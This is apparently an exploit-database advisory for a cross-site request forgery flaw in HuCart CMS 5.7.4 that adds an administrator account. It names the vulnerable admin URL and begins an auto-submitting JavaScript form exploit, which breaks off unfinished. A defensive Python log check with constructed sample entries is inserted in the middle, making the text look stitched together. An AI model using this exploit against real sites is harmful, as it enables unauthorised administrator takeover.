Exploit / Vulnerability Discovered: 2019-01-14
Type: webapps
Platform: php
This exploit / vulnerability, HuCart CMS 5.7.4 cross-site request forgery (add administrator account), is for educational purposes only; if you use it, you do so at your own risk!
An issue was discovered in HuCart v5.7.4. There is a CSRF vulnerability that can add an admin account via /adminsys/index.php?load=admins&act=edit_info&act_type=add. (References: http://www.iwantacve.cn/index.php/archives/109/)
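A log check for the request described above, as an added example that is not part of the original advisory or of HuCart: it flags POSTs to the admin-creation URL whose Referer is missing or names another host. The combined log format, the host name shop.example and the sample lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Admin-creation request named in the advisory.
TARGET_PATH = "/adminsys/index.php"
TARGET_QUERY = {"load": "admins", "act": "edit_info", "act_type": "add"}

# Apache/nginx "combined" access log format (assumed).
LOG_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<uri>\S+) [^"]*" (?P<status>\d{3}) \S+ '
    r'"(?P<referer>[^"]*)" "(?P<ua>[^"]*)"'
)

def is_admin_add(uri):
    """True if the URI is the admin-creation action, in any parameter order."""
    parts = urlsplit(uri)
    if parts.path != TARGET_PATH:
        return False
    query = parse_qs(parts.query)
    return all(v in query.get(k, []) for k, v in TARGET_QUERY.items())

def suspicious_admin_adds(lines, site_host):
    """Return (timestamp, client ip, referer) for POSTs to the admin-add
    action whose Referer is missing or names a host other than site_host."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m or m["method"] != "POST" or not is_admin_add(m["uri"]):
            continue
        ref_host = urlsplit(m["referer"]).hostname  # None for "-" or empty
        if ref_host is None or ref_host.lower() != site_host.lower():
            hits.append((m["ts"], m["ip"], m["referer"]))
    return hits

# Constructed sample log lines (not taken from a real server).
SAMPLE_LOG = [
    '203.0.113.7 - - [14/Jan/2019:10:01:02 +0000] "POST /adminsys/index.php?load=admins&act=edit_info&act_type=add HTTP/1.1" 200 512 "http://shop.example/adminsys/index.php?load=admins" "Mozilla/5.0"',
    '198.51.100.23 - - [14/Jan/2019:10:05:40 +0000] "POST /adminsys/index.php?load=admins&act=edit_info&act_type=add HTTP/1.1" 200 512 "http://other.example/page.html" "Mozilla/5.0"',
    '198.51.100.23 - - [14/Jan/2019:10:06:11 +0000] "POST /adminsys/index.php?act_type=add&act=edit_info&load=admins HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [14/Jan/2019:10:07:00 +0000] "GET /adminsys/index.php?load=admins HTTP/1.1" 200 2048 "http://shop.example/adminsys/" "Mozilla/5.0"',
    '203.0.113.7 - - [14/Jan/2019:10:08:30 +0000] "POST /adminsys/index.php?load=admins&act=edit_info&act_type=edit HTTP/1.1" 200 512 "http://other.example/page.html" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for hit in suspicious_admin_adds(SAMPLE_LOG, "shop.example"):
        print(hit)
```

A missing Referer can also come from a browser privacy setting, so those hits need review against the admin accounts actually created at that time.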
After the administrator has logged in, open the CSRF exploit page.
-->
<html><body>
<script type="text/javascript">
function post(url, fields)
{
    var p = document.createElement("form");
    p.action = url;
    p.innerHTML = fields;
    p.target = "_self";
    p.method = "post";
    document.body.appendChild(p);
    p.submit();
}
function csrf_hack()
{
    var fields;